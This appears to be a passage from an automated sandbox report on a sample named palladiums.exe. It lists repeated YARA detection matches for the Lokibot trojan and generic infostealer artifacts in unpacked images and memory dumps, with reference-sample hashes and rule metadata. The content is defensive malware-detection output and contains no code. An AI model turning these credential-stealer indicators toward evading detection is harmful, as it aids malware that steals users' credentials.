                Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
